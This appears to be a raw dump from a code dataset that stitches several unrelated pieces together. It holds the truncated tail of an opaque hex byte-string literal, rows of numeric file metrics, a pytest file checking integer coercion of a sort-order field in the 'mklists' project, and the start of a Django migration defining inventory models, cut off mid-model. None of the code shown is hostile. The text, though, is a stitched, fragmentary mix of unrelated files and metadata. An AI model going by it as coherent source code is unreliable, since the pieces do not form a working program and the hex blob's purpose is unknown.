24\xf3\xb3\x96\x8d\x69\xee\x69\x44\x90\x22\xf0\xb9\x29\x40\x6e\x13\xad\x6f\x69\x32\x68\x45\x51\x68\x47\x22\x89\xd7\x66\x06\x77\x09\x3b\xd0\x54\xd4\x9b\xcf\xcc\x2c\x94\x8d\xef\xf9\x5a\xd1\xe7\xcf\x16\x8f\x24\x8b\xa2\x63\x35\xca\x59\xa7\x84\x52\xf3\xca\xac\x98\xcb\x07\x1e\xd6\xd1\xc6\x78\x52\xb6\x7d\xe3\xae\x86\x3c\x39\x4d\x7e\x09\x82\x7a\xd1\x71\x62\xbc\xff\xf0\x65\xf1\xf9\x38\xac\xe7\x42\x47\x7f\xe8\x38\x8d\xdb\xeb\x20\x58\x88\x5e\xef\x7d\x6f\xad\xc0\xc1\xde\x49\x37\x3d\xd2\xee\x3c\xbc\x1c\x82\x5e\x4e\xf3\x40\xec\xc0\xf8\x4f\xe6\xd0\x65\x48\x23\x98\x36\x43\xbe\x75\x95\xe7\x71\x01\x47\x3e\xb3\x13\x19\x26\xa3\x8a\xad\x76\xd1\xd9\x4a\x81\x10\x58\x63\x28\x52\xa5\x4f\x94\x43\xc7\xbf\xe7\x02\x60\xc1\x29\x9f\xf3\x15\x96\x3a\xe8\x9c\x09\x05\xc7\x37\x29\x66\xf9\x00\x82\xb4\xf2\x6f\x5b\x33\xdd\xd8\xad\xdd\x26\xe4\x79\x66\x88\xbe\x79\xe7\x4f\x90\xb4\x01\x80\xeb\xda\x89\xc3\xc0\x77\x52\xe9\xcc\x3d\xa0\xbc\xf4\x93\x5d\xdd\x82\x2e\xc8\xcc\x3e\xc2\x12\xdb\x1a\x63\x96\x6e\x54\x62\xe4\x65\xc7\x38\x8d\xc5\x1e\x06\x54\xe6\x95\xed\x11\xde\x5a\xae\x62\x98\xcc\x98\xed\x2a\x4d\xff\xce\xa7\x68\xcd\xcf\xa8\xac\x77\xc8\xdf\x73\xa0\x59\x23\xde\x6c\x2a\x99\x84\x75\x82\x90\xf2\x5a\x2e\xe4\xe5\x64\x06\x34\x77\xe8\xe2\x57\xd9\x74\xb6\x0f\x14\x53\x3a\xf2\x89\xd3\x64\x7b\xe6\x26\x07\xe3\x21\x0f\xb3\xc7\x4f\xcf\x1a\xef\xc9\x95\xf4\xdb\xbe\xec\x6a\x62\xd2\x2a\x15\xf2\x82\xb5\x7c\xf0\x0c\x31\xc5\xa2\x25\xc0\x73\x84\xe5\x12\x74\x66\xcc\x03\x11\xc3\x7c\x08\xc0\xda\xa5\x3a\x01\xa7\x39\xe0\x27\x0a\xf2\xb9\xda\xe2\xea\xd5\x23\x34\x40\xa5\xec\x88\x8b\xf2\x4b\xcb\x6c\x86\x2f\xb9\x68\xb5\xd2\x82\xc3\x96\x42\x1b\x4f\x9d\x01\xc1\xfc\x83\x4e\x97\x38\xc1\x67\x2b\xf5\xe6\x82\x19\x61\xf5\x7c\xeb\xdb\x55\x6f\xda\x53\x7a\xb8\x59\xd6\x79\x21\x63\xc4\xbb\x8c\x11\x57\x6a\xf5\xd9\x48\x57\xa7\xee\xd0\x5f\x99\x7c\x32\x55\xca\x93\xf3\x9e\xe4\x70\x02\x24\x44\xba\xed\x5d\x5e\x93\x09\xfe\xa6\xb7\x62\xf3\xd4\xbe\x06\x49\x3c\x1f\xeb\x06\xb7\x17\xe7\x26\x5f\x4b\x05\x6a\x67\x24\x42\x8d\xf2\x69\x3f\x9d\x99\xc5\x3a\xa5\x04\x2a\x4f\x
82\xb7\x6d\x68\x65\x6d\x1d\x3f\x67\xfb\x01\x6c\xee\x24\xae\x56\x5b\xeb\x9e\x14\x9b\x30\x9d\xc4\x1a\xdd\x1e\xd3\xfe\x99\x7b\x00\x78\x66\x87\xb7\x96\x50\x92\xd3\xff\x11\x3b\xaa\x9e\x99\x70\xaa\xf7\x68\xee\xea\xe6\xe5\x3c\x90\x23\xba\xd1\xde\x58\x78\x34\x18\x5c\x55\xcb\x0d\xd9\x3f\xe8\x0a\x95\x20\xdc\xa9\x90\xdc\xb5\x4b\x07\xb4\xd2\x3e\xf4\x14\xf9\x49\x9e\xc1\xaa\xc4\x33\xd4\xea\x64\x76\x66\x95\xe1\x77\xab\xc2\x51\xfc\x4e\xb4\xdd\x2b\xce\xea\xb4\x67\x23\xae\x68\x1d\x6f\xc2\x98\x11\x61\x47\x70\x87\x40\x59\x65\xfc\x97\xc1\xa2\x95\x07\xac\xde\xf4\xd4\xc4\xea\xc4\x7d\x56\x76\xc6\x5e\xe8\x6d\xb8\x17\x1a\xe0\x51\x78\xbc\x58\x3a\x0c\x0f\xa7\x5d\x9f\xef\x65\x4f\x4a\xb9\xd4\x67\x33\xca\x1a\x5e\xda\x4f\x03\x9d\xaa\x67\xfe\x9e\x2c\xed\x86\x8b\x21\x59\xf0\x31\xa4\xa6\x36\xfe\x03\x3e\x86\xe6\x44\xa9\x06\x2e\xb5\x88\xc9\x84\xfa\xd2\xbe\xf9\xed\x05\xe2\x3a\xc3\x8d\xea\x77\xcc\xca\xf8\x7b\x75\xd9\x2c\x8f\x49\xd6\xa0\xce\xd9\x20\x1d\x01\x12\x46\x27\xf1\xa3\x5b\x9f\xe5\xca\xa4\xe9\x00\x1f\x47\x60\xe9\x99\x6a\x2f\xb4\x4a\xf3\x24\x20\x6a\x75\x97\x45\x62\xc7\xec\xf7\x17\x4f\x8c\xf0\x3d\xa7\x3d\xd4\x31\xf1\x8d\x6a\x42\xee\xe5\x14\xa6\x81\x86\xf9\xd1\x83\x59\x98\xd5\xa5\x83\x9b\x63\xfe\x4b\xf5\xa1\x12\x58\x5e\xd7\x9a\x6e\x4e\x5c\x26\x65\x68\x8c\xb0\xa6\x71\xb8\xfc\xdb\xf9\x0f\x76\xef\xdd\xe6\x42\x4b\x7f\x13\xc2\xe4\xcd\x5d\xb5\x2b\x06\xa7\x17\xd1\xc9\xb3\x36\xb8\xce\xa0\x8f\xfa\x03\xa5\x9b\x2c\x99\x00\xb2\x87\x11\x7f\x66\x86\xf6\xc9\x6b\x7e\x40\xb4\x60\x24\xd2\x3d\x57\x1d\xe4\x67\x23\x95\x25\x36\x6c\x04\x75\x22\xfd\xbd\x1e\x83\xf9\xbf\x21\x7b\x3f\xbb\x88\xa1\x94\xcb\x06\xa0\xc8\x23\x41\x0e\x33\x3d\x42\x51\x7d\x34\xc7\xdf\x68\xb0\xe7\x83\x65\x5c\xa4\xce\x1f\x5d\x91\x97\x0c\xfa\xa9\x68\x14\x28\x3b\xad\xda\xd8\xc2\x22\x65\x94\xaa\x21\x86\x87\xbe\x52\x9a\x3d\xa5\x00\x15\x5b\xc2\x20\x3c\x88\xeb\x68\xdf\x0e\xa2\xa5\x83\x92\xda\x4c\x0c\x21\x78\xe9\xcf\x0d\xd7\xa9\xad\xbc\xbe\xdc\x2a\x96\x84\x47\x8c\x95\x75\x37\xd9\x41\x6f\xea\x29\xa4\xfb\xe0\x8a\xe2\x5d\x9c\xd3\x56\x77\xde\xae\x4c\x51\x53\x93\x75\x
67\x9f\xec\xc2\x9c\xd1\x71\xb0\xf8\x66\x08\x09\x40\xef\x92\x63\xe8\x17\x76\xc2\xc8\x2b\xe3\x48\x16\xe4\x6a\x46\x1a\x8b\xad\xc0\x60\xb4\xf0\xa7\x1b\xb2\x99\xe0\x5a\xca\xb0\x91\x77\x8d\xda\x33\xe3\x5b\x14\x32\xb1\x74\x05\x6f\x97\x2b\xd8\x2c\x82\xe0\xd7\xec\x7e\x72\xda\xc3\x06\x6a\xcd\xfa\xfe\xae\x1b\x67\x92\xe8\x8c\xb2\x2f\xec\xc2\x2c\x75\xfa\x8c\x40\x20\x64\xf7\x76\xf3\xfc\xc2\x3b\xe3\x08\x2c\xa6\x82\x02\xc4\x41\xd5\xe0\x26\xed\x00\xe3\x85\x98\xab\x76\x57\xb2\xa2\x09\xcf\xc2\xf1\x90\xf4\x53\xe0\x1d\x3e\xd3\x80\x14\xea\x9e\x4e\x78\x94\x2e\xbc\x8b\xed\x8a\x48\x2b\xd5\xf3\xf0\x88\x18\x28\x08\x99\xf0\x8b\x34\x70\x44\x56\x43\x64\xb8\x5c\xb3\xe1\x01\xc1\x2e\xaa\xa3\x72\xf8\xf2\x7d\x5a\xb5\x3c\xce\x95\xb9\xad\x04\xce\xed\x35\xa4\x6b\xad\x94\xe8\x78\xc2\xed\xe7\x76\x41\x27\x92\x0c\xb9\xe4\x98\x93\x97\x98\xea\xc0\xdc\x64\x85\x91\xfb\xcc\xce\x6d\x89\x93\x00\xad\xf2\xf6\x4d\x3d\x88\x18\x2c\x5e\xca\x5c\x1f\xd1\xd7\x69\xa5\xb3\xfd\xe8\xc5\x7a\x29\x13\xbc\x96\xd7\x2d\x08\xe9\x4c\x10\x6e\x8a\xef\x17\xf3\x1a\x60\x60\xc6\xf4\x18\xea\x74\x46\xf2\x18\xd8\xc8\xbb\xa8\xfa\xd5\x22\x04\xab\x3c\x2b\x36\x37\x36\xae\x40\x69\x11\xc4\x4e\xda\xa7\x14\x29\xaa\xf8\x12\x7b\x5b\x8b\x23\xb5\xf8\x28\xe5\xa7\x96\x04\x80\xd9\xe4\x6a\x10\xa6\xe6\x7e\x1d\xc8\xec\xd1\xcd\xc7\x2a\x25\x6d\x37\xb8\x7a\x37\xd7\x75\xfe\x16\x20\xc5\x53\x04\x23\x6c\x31\xfc\xcb\xd3\x0e\xd4\x57\x1b\xc1\xce\xdb\x37\x89\x35\x5b\x04\x9c\xc0\xe8\x13\x51\x0c\x83\x22\x54\xa2\xe6\xc0\x15\x85\x0b\x23\x77\x59\x46\x27\xec\x5f\x33\xc9\x80\xab\x21\xa4\xd7\x6f\xa4\x5f\xea\x36\x7f\xa5\xff\x65\xb9\x7a\xc0\x7e\xc9\x33\x1a\xa2\xd9\xec\x3d\xe5\xd5\x05\x72\xc9\xc7\xe0\xd5\x26\xc0\xa0\xd4\x11\x3e\xd3\x97\x81\x79\x04\x26\x31\xd0\x27\x3e\x8b\xe6\x2c\x1e\xf6\xaf\xc0\x4c\x48\xb9\x70\xa6\x34\x22\x65\xfd\x25\x14\xce\x46\xf8\xe8\xba\xc3\x52\xa3\x55\xf6\x5c\x31\x50\x5c\x70\x62\x3b\x00\x40\x6e\x8d\x95\xf3\xc0\xd5\x07\x5e\x11\xc8\x56\xef\x21\xa8\xfc\x34\x11\x33\x4d\x84\xaf\xf0\x3c\x29\x9b\x99\x37\xc1\x7a\x3c\xc4\xf1\x04\x1a\xb0\x7f\xec\xee\x1c\x00\xc2\xe3\x3a\x
4e\x62\x67\x99\xfb\x16\x7b\x12\xdc\x78\x4f\x87\xd0\xe3\xc1\xf6\x9b\x2f\xfd\xfa\x12\x5d\x52\x68\x53\x87\x06\x58\x42\x54\x49\x49\xc8\x34\x81\xe4\xb5\x56\x45\x06\xa9\x20\x3c\x46\xe1\xe6\x25\x11\xf1\x31\x94\x98\x13\xe6\xed\x72\xc4\x42\xa4\x70\xaf\xd1\x8a\x80\x4c\x6e\xf4\xf2\xa6\xd6\x76\x12\xb3\xeb\xea\xf6\x72\xfb\xaf\x59\xdb\xaa\x1d\x29\x68\x56\x6e\xdf\xca\xe4\x18\x3c\xe7\x3b\x88\x85\x10\x1c\xde\xef\x21\x09\x27\x09\x7b\x73\x1d\xe6\x9d\x0c\xc6\x14\x09\x8c\xf5\x7d\x32\x86\xea\xf8\x2f\x9d\x2d\xc4\x43\x6b\xe6\x7b\x94\xf1\xc6\x0d\x24\x40\x60\x3f\xb0\x17\x34\x8b\xe7\xe1\x52\x3f\x0c\xbc\x2f\x5f\x29\x52\xee\x8c\x27\x75\xcf\x06\x6b\x0c\xd8\x5b\x1c\x08\x78\x57\x11\x6a\xda\x40\x20\x32\x9c\x5a\x40\x71\x22\x4a\xfd\x47\xb9\xd0\x18\x74\x3f\x3b\x31\x37\x10\xe0\x05\xdf\x0d\x63\xfe\xa4\xe3\x08\xca\x79\x90\x23\xdd\x50\xd6\xd0\x98\x38\xd5\xfc\x9f\xec\x0d\x8f\x9f\x2e\x51\xb3\x22\x85\xd3\x8a\xbb\x7a\xfc\x49\x85\x53\x41\x5f\x0f\xdc\x22\xe7\x4d\x56\xad\x94\xe5\x44\x9a\xcd\x55\x6c\x89\xc6\x2e\x3c\x5c\x61\x10\x15\x59\xf4\xb5\x05\xf5\x83\x0d\x13\x9b\xe0\xd8\x31\xa7\xb1\x59\xab\xa5\x69\xd2\xf9\xe8\x9e\x20\xdb\x6d\xc8\x33\x61\x3b\x13\xe7\x62\x2e\xdf\x83\x35\x12\x2f\x19\x2f\x14\x10\x88\xca\xdc\xb8\x11\x25\xd1\xbf\x53\x91\x0f\x7d\x0a\x0c\x48\xb5\x47\x08\x5e\xbf\x66\x23\xd4\x5e\xdb\x5f\x0a\x9e\x3a\xd6\x8a\xf0\x59\xcb\xce\x61\x6a\xdb\xf2\xc8\x2e\x04\x73\xd0\x69\x27\xb5\x5d\xe9\xc5\x44\xae\x7a\x07\x44\x9d\xa1\x75\x6d\xbe\x97\x60\x50\xd4\x5e\x63\x86\xe0\x1f\xf5\x85\x70\x85\x13\x0f\xe3\xd9\x20\x68\xaa\xc2\x43\x43\x2c\xa7\x0a\x9e\x99\x12\xb8\x1a\xd0\xd8\x09\x72\xc4\xbe\x63\xe9\x3a\x78\xa6\x5c\xb6\xb6\x46\x5f\xa7\x96\x5f\xe2\x6d\xe3\x89\x1b\xcf\x42\x2b\x06\xa6\x05\x3b\xc2\x01\x6f\xcc\xe4\x34\x8a\x66\xa9\x82\x64\xba\x27\x66\xc6\x69\x1b\xa2\x05\xda\x89\x5c\x61\xa1\xc3\xf7\xa7\xab\xe6\x8d\x4f\xc1\x53\x9c\xd6\x85\xe3\xb3\x45\x2f\x7d\x27\x17\xd4\x64\x77\xfe\x28\x97\xa7\xf2\x06\xd1\x48\x8b\x37\x7d\x1e\x95\x73\x1a\x2d\xbd\xec\x3f\x86\x55\x28\x6a\xc1\xc4\x46\x2f\x26\xe8\xbc\x95\x5d\x02\x85\xe7\x29\x19\x12\xd2\xa9\x
f4\x0c\x55\x9f\x07\x30\xd2\x90\x3e\x0f\x72\xfd\xd9\xfc\x36\x2e\xa0\x0e\x4f\xc9\x65\x2b\x14\xf7\x21\x54\x7a\x1d\x20\x77\xc4\xa1\x65\xa5\xd6\xec\x09\x9c\xf6\x9b\xb8\xb8\x04\x0d\xe4\xf4\xba\xc8\xc4\x67\x86\x2f\x2d\x57\x56\x60\xa5\x1d\x65\x52\x1a\x34\x59\xcf\x58\x93\x41\xdd\x8f\xec\x3d\x05\x4b\x73\xeb\x40\x1f\xce\xf5\x27\x0d\xb3\xd0\xb5\x79\xe6\xfb\x52\xd6\x56\x5b\xc6\x8b\x24\xac\xff\x09\xa6\x50\xa8\xa6\xb6\x75\xfe\xc8\x3c\xaa\xc1\x83\xc9\x05\xa1\x11\x82\x86\x13\xbb\xb6\x37\x70\x6d\xf5\x09\x8a\xf0\x2d\xfd\x1e\xd0\x82\xba\x60\x0b\xed\xa9\x77\x09\x13\x78\xd4\xb7\xfb\xbe\xb1\xe8\x5c\x52\xa0\x09\x5b\x1a\xe1\x86\xb5\xc7\x62\xae\x65\xab\xe5\x39\xc2\x42\x63\x2f\x40\x68\x6e\xd8\xf8\xb9\xe2\xdd\xdf\x45\x79\x88\x92\xce\x73\xc9\x73\xd4\x79\xc4\x6c\x79\xdc\x4a\xfa\x67\x30\x4e\x7c\xaf\x1a\xa9\xd0\x91\xde\xc8\x4c\x55\x3c\xcb\xe2\xa9\x34\x52\xd5\xc5\x55\x2b\x9c\xc1\xaf\xcf\x08\x86\xd5\xd7\xf6\xc8\x05\xd1\x8a\x84\xd3\xf7\x18\xcd\xb8\x7b\x46\x8e\x0b\xe6\xa2\xb9\xf1\x43\x5b\xf5\x99\x82\x2d\xf5\x99\x93\x6c\x77\x2c\x47\x8d\x0f\x8f\xcd\x75\xba\xff\x42\x6a\x2d\x60\xa1\x42\xf1\x91\x51\x23\x2d\x65\xaf\xae\xfc\xea\x7a\x13\x83\x5d\xc1\x7b\xd2\xa5\x59\x9f\x39\xaf\xd3\x73\x72\xf3\x98\x2b\x91\x82\x53\x3e\x6a\xc0\xa7\xf3\x1f\xf2\xcf\xfc\x62\x02\x04\x92\x0c\x18\x16\x25\xac\xf7\xa2\x94\xca\x40\xc7\x24\xd8\x51\xbb\x4c\x02\xd5\xe0\x98\x03\x14\x2c\xed\x3a\x77\x07\x4a\xea\x29\x0c\x19\x81\x51\xa8\xf4\xd9\x0b\xaf\x6f\x72\x43\x6e\x74\x42\x87\xe4\x7c\xc2\xcb\xec\xd9\x36\xad\xfa\x1e\xb9\x3f\xf8\xad\xc0\xb7\x8b\x68\x24\x30\x1c\x08\x74\xe1\x3d\xac\x3f\x78\xd7\x12\x08\x5c\xf3\x16\xbb\x11\xbe\xb1\xc2\x8b\x41\xfe\x36\x76\x64\xa7\xe4\x69\x49\x91\x3b\x01\x09\x1a\xf9\x4a\xe8\x4a\x6d\x51\xb4\x09\xe2\x11\x1e\x0f\x01\x54\x89\xdd\x4c\xde\xd6\x8f\x32\xea\x6f\xca\xc8\xe6\xad\x4a\x11\xac\x74\xdd\x7d\x9a\xee\xd4\x73\xf2\x11\x56\xe1\x9a\xbf\xd3\x5f\xc6\xc2\xe2\x48\xbc\x86\x7f\x9e\x2d\x6d\x92\x91\x96\xd5\xb7\xa9\x56\xc2\xdd\x1d\x5d\x14\xa5\xf0\x49\x2b\x05\x64\x67\x95\xf5\x05\x28\x8f\xa8\x2d\xfc\x85\xb0\x68\x31\xf4\x8b\x10\xe5\x
d8\x0c\x1c\xfa\x79\x9f\x8e\x8f\xe5\xc0\x67\xe6\x5c\xc5\xca\x42\xc4\x70\xc8\xe5\x73\x25\xc2\x92\x09\xc2\x4e\x8b\x3a\x6d\x91\x3e\xa9\x15\xe4\xbc\xdf\xf2\x14\x6e\x75\xe8\x23\xc9\x48\xe9\xe6\x24\x66\x9d\x9a\xf0\xed\x27\x67\xcb\xce\xa9\x05\x5a\x91\x0f\x10\xb4\xa8\xc1\xbe\xec\x84\x96\x3f\xd4\xea\x2f\xcc\x37\x78\x74\xdc\x96\xe2\x5c\xfa\x5a\x41\x19\x9f\xc8\xbd\x05\x95\xe6\xc9\x4e\x50\x1b\xd8\x4d\x91\xe5\x07\x11\xf5\xd8\x80\x00\x19\x90\x6c\xf1\xc7\x3a\xa4\x53\xaf\x51\xc7\x24\x97\x15\x9e\x0a\x02\xac\xaf\x4b\x39\x08\xe8\xde\x65\x76\x81\x58\xfd\x4e\xd6\x57\xfa\xa9\xef\xa4\x62\xc3\x55\xcd\x73\x7c\x06\x17\x69\x7e\x13\xe3\x86\x12\x24\x08\x15\x31\x0e\x6f\xa7\xc6\xbc\x07\xe0\x4a\xe3\xfc\xeb\x96\x6c\x05\x3c\x47\xad\xaf\xc9\xa8\xe7\xd1\xe1\xc7\x51\x7d\xb0\xea\xec\x8e\x94\xce\xba\x3f\x48\xc7\xc7\xf9\x69\x32\x58\x08\x48\x01\x50\xec\x68\xb1\x8d\xed\xab\xe3\x49\xc1\xf9\x68\x0d\x64\x48\xca\x81\x86\xe8\x47\x51\x6c\x44\x71\x8d\x7a\x99\x34\xd1\x0a\xae\x60\xe5\x40\x97\x12\xcb\x2f\xa2\x99\x3b\xf0\xd7\x99\xba\x04\x43\xfd\x33\x32\xbf\x04\x7d\xa0\xb4\x0a\xfb\xb9\x86\x07\x29\xde\xf8\x98\x91\x60\x2e\xfc\x36\x40\x15\xb1\x09\xaa\x20\x03\xf3\xb4\xac\x2c\x63\xf0\x56\x8f\xd9\xee\x6a\xe6\x53\xaf\xa8\xf2\xf1\xa5\xfa\x03\xe4\x08\xc6\x5f\x21\x42\xbc\x94\xa1\x62\x59\x5e\x85\xd0\x77\x3e\x6e\x55\x9b\x97\xb0\x86\x8a\x3a\xc8\xe9\xdf\x08\xea\x2f\x6d\x8b\x81\x87\x47\x51\x16\x90\x7e\xd6\x92\xb5\x6a\x6b\xf5\x6d\xb4\xa9\x86\x2f\xdc\xba\x24\x3f\xd4\x15\x52\x78\x21\x59\xf2\x5f\xfc\x67\x6f\x52\x18\x30\x01\x28\xbf\x0a\xb3\x1c\x19\x04\xc6\x38\x89\x8c\x13\x4e\x17\x35\xdd\x39\x0b\x34\x3d\x1a\x5b\x40\x49\xe6\xc4\x4d\xfb\xdc\x00\xd5\x03\xe2\x1c\xaf\xf4\xb2\xe0\x83\xf4\x05\xad\x19\xdd\x3d\x30\x07\x66\x1f\x20\x13\x47\x26\x59\xdd\x3c\x2f\x87\xf6\x68\x36\xb9\x63\xef\xae\x8f\x87\xf4\xb3\x90\x07\x19\x52\x73\xf6\x9a\xdb\xfa\xbe\x23\x06\xeb\xfb\x75\x99\x04\x82\x84\x3d\x51\x2f\x06\x3c\xeb\xe4\x2f\x50\xe7\xfb\x9b\x1e\x6b\x90\xdd\x6d\x28\xe2\x13\x53\xcb\x29\x8d\x2e\x84\x2d\x0f\x8b\x5e\x72\xea\xf1\x8c\x1c\xd2\xda\x7e\x21\xe8\xde\x82\xc0\x
39\x22\xcf\x26\xf9\x2c\x3f\x78\x0c\xe5\xc7\x54\x53\x37\x53\x6e\x32\xed\x51\x4f\x4d\x9f\xbd\xb5\x88\x8b\x41\xa6\xe4\xb5\x22\xfa\x95\x91\x18\x9c\xc8\xdc\x18\x5b\x67\x9a\x96\xce\x7e\x0a\xca\xa6\xc6\x2d\xfe\x87\x4b\x50\x53\xb1\xd2\x30\x06\xa7\x5a\x30\x02\x6f\xef\xbf\x95\x37\xa7\x56\xce\x28\xbf\xec\x11\x10\xa0\x96\xc5\x80\xbd\xfa\xa5\xf0\xcb\x58\x6c\x40\x70\x2a\xb0\x62\xdf\xd1\xf4\x32\xde\xc6\xf6\x20\x00\x25\x5d\x62\x72\xf7\x3a\x80\x1f\xc3\x33\x96\xcf\xd3\x3c\x66\x10\x70\x0b\x7e\x31\x3c\xce\x13\xa0\x25\xe9\xd0\xb2\x95\x3c\x2e\x3f\x13\x20\x9d\x70\x01\x9d\x38\xf9\xfd\xa7\x7f\xdf\x58\x34\x09\xd4\xe4\xa9\x57\x8c\x1f\xa5\xf7\xdf\xdf\x78\x92\xde\x63\x6f\x47\xc7\x54\xb1\xf8\xb4\x89\x77\x36\x1a\x9f\xd2\xee\x64\x83\xb5\x4d\x33\xa0\x5c\x08\xa3\x86\x5f\xf6\x00\x51\xe6\x09\x33\xdb\x42\xdb\x0e\x53\xdb\xbd\x40\x3a\xd5\x25\x82\x74\x9b\xee\xf0\x5a\x68\x10\x03\x2a\x60\x8f\x5e\x9b\xe0\x6c\xe5\x8b\x13\x83\x44\xdf\xa8\xa1\x67\xf5\x40\xeb\x12\xb3\x6a\x50\xac\xe9\xec\xab\xde\xaf\x23\x70\xc0\x86\xe2\xee\xe1\xd0\x70\xa8\x87\xe1\x0f\x0e\x7a\xb7\xfe\x5d\xea\xae\x4e\x56\x66\x49\x98\x48\x8e\xac\x2d', 2) | 8,382.333333 | 25,087 | 0.750229 | 6,274 | 25,147 | 3.004782 | 0.042238 | 0.006047 | 0.006206 | 0.005092 | 0.002069 | 0.001273 | 0.001273 | 0 | 0 | 0 | 0 | 0.311612 | 0.000398 | 25,147 | 3 | 25,087 | 8,382.333333 | 0.438358 | 0 | 0 | 0 | 0 | 0.333333 | 0.996103 | 0.996103 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 11 |
32eb57dd3067d50da4aa69fe2fbb158272472591 | 1,300 | py | Python | tests/rules/test_ruleclass__coerce_target_sortorder_as_integer.py | tombaker/mklists | 1a4150d5cc2df81604fbfbb2dbad2bd74d405a5f | [
"MIT"
] | 1 | 2018-07-25T13:22:31.000Z | 2018-07-25T13:22:31.000Z | tests/rules/test_ruleclass__coerce_target_sortorder_as_integer.py | tombaker/mklists | 1a4150d5cc2df81604fbfbb2dbad2bd74d405a5f | [
"MIT"
] | 8 | 2015-03-14T06:40:24.000Z | 2019-09-04T11:40:22.000Z | tests/rules/test_ruleclass__coerce_target_sortorder_as_integer.py | tombaker/mklists | 1a4150d5cc2df81604fbfbb2dbad2bd74d405a5f | [
"MIT"
] | null | null | null | """Coerce strings of YAML origin to required types."""
import pytest
from mklists.rules import Rule
def test_coerce_target_sortorder_as_integer():
"""Field 1 (target_sortorder) must be an integer."""
rule_obj = Rule(1, "NOW", "a", "b", 2)
rule_obj._coerce_target_sortorder_as_integer()
assert isinstance(rule_obj.target_sortorder, int)
def test_coerce_target_sortorder_as_integer_given_good_string():
"""Field 1 (target_sortorder) must be an integer."""
rule_obj = Rule("1", "NOW", "a", "b", "2")
rule_obj._coerce_target_sortorder_as_integer()
assert isinstance(rule_obj.target_sortorder, int)
assert rule_obj.target_sortorder == 2
def test_coerce_target_sortorder_as_integer_raise_exception_given_bad_string():
"""Field 1 (target_sortorder) must be an integer."""
rule_obj = Rule("1 2", "NOW", "a", "b", "1 2")
with pytest.raises(SystemExit):
rule_obj._coerce_target_sortorder_as_integer()
def test_coerce_target_sortorder_as_integer_raise_exception_given_non_integer():
"""Perversely, int(1.2) evaluates to 1; improbable edge case?"""
rule_obj = Rule(1.2, "NOW", "a", "b", 1.2)
rule_obj._coerce_target_sortorder_as_integer()
assert isinstance(rule_obj.target_sortorder, int)
assert rule_obj.target_sortorder == 1
| 37.142857 | 80 | 0.735385 | 191 | 1,300 | 4.617801 | 0.251309 | 0.272109 | 0.190476 | 0.208617 | 0.803855 | 0.803855 | 0.803855 | 0.678005 | 0.678005 | 0.678005 | 0 | 0.018002 | 0.145385 | 1,300 | 34 | 81 | 38.235294 | 0.775878 | 0.190769 | 0 | 0.35 | 0 | 0 | 0.02729 | 0 | 0 | 0 | 0 | 0 | 0.25 | 1 | 0.2 | false | 0 | 0.1 | 0 | 0.3 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
32eefefca6e6295a1498f543cc2c3f8352b01438 | 7,722 | py | Python | codenerix_storages/migrations/0013_auto_20180216_1444.py | codenerix/django-codenerix-storages | bd77bde0cc26a72b892fb5d8e98f20587bb93415 | [
"Apache-2.0"
] | 1 | 2017-11-23T13:28:47.000Z | 2017-11-23T13:28:47.000Z | codenerix_storages/migrations/0013_auto_20180216_1444.py | codenerix/django-codenerix-storages | bd77bde0cc26a72b892fb5d8e98f20587bb93415 | [
"Apache-2.0"
] | null | null | null | codenerix_storages/migrations/0013_auto_20180216_1444.py | codenerix/django-codenerix-storages | bd77bde0cc26a72b892fb5d8e98f20587bb93415 | [
"Apache-2.0"
] | 2 | 2018-05-15T10:15:26.000Z | 2018-05-22T10:01:40.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.10.8 on 2018-02-16 13:44
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('codenerix_invoicing', '0013_salesorderdocument_removed'),
('codenerix_products', '0011_auto_20180202_0826'),
('codenerix_storages', '0012_inventory_kind'),
]
operations = [
migrations.CreateModel(
name='InventoryIn',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Created')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Updated')),
('end', models.DateTimeField(blank=True, editable=False, null=True, verbose_name='Ends')),
('provider', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='inventorys', to='codenerix_invoicing.Provider', verbose_name='Provider')),
],
options={
'abstract': False,
'default_permissions': ('add', 'change', 'delete', 'view', 'list'),
},
),
migrations.CreateModel(
name='InventoryInLine',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Created')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Updated')),
('product_unique_value', models.CharField(blank=True, default=None, editable=False, max_length=80, null=True, verbose_name='Product Unique Value')),
('quantity', models.FloatField(default=1.0, verbose_name='Quantity')),
('caducity', models.DateField(blank=True, default=None, null=True, verbose_name='Caducity')),
('box', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='storage_inventoryinline', to='codenerix_storages.StorageBox', verbose_name='Box')),
('inventory', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='inventory_lines', to='codenerix_storages.InventoryIn', verbose_name='Inventory line')),
('operator', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='storage_inventoryinline', to='codenerix_storages.StorageOperator', verbose_name='Storage Operator')),
('product_final', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='storage_inventoryinline', to='codenerix_products.ProductFinal', verbose_name='Product Final')),
('product_unique', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='storage_inventoryinline', to='codenerix_products.ProductUnique', verbose_name='Product Unique')),
],
options={
'abstract': False,
'default_permissions': ('add', 'change', 'delete', 'view', 'list'),
},
),
migrations.CreateModel(
name='InventoryOut',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
